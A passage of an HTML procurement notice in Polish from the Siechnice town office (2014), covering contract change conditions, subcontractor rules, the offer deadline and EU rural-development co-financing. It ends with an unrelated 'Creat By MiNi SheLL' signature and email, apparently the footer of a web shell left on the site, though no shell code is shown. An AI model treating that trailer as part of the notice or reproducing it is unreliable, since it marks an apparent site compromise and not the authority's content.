Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub 8)przerwy w robotach
spowodowanej wystąpieniem znalezisk archeologicznych lub innych znalezisk czy wykopalisk,
uniemożliwiających wykonywanie robót lub 9)wstrzymania przez Zamawiającego wykonywanie robót lub 10)nie przekazania przez Zamawiającego terenu budowy w terminie określonym w umowie lub 11)innymi
okolicznościami nie powstałymi z winy Wykonawcy. Uwaga: Zamawiający dopuszcza zmianę terminu
umowy w sytuacjach, które muszą być udokumentowane przez Wykonawcę w sposób jednoznaczny i nie
budzący wątpliwości. 14.Zamawiający dopuszcza zmianę podwykonawców realizujących poszczególne
części zamówienia w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego)
podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez
podwykonawcę. Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z
podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie
szczegółowo poisanym w istotnych warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany w ramach działania 413 Wdrażanie lokalnych strategii rozwoju
PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com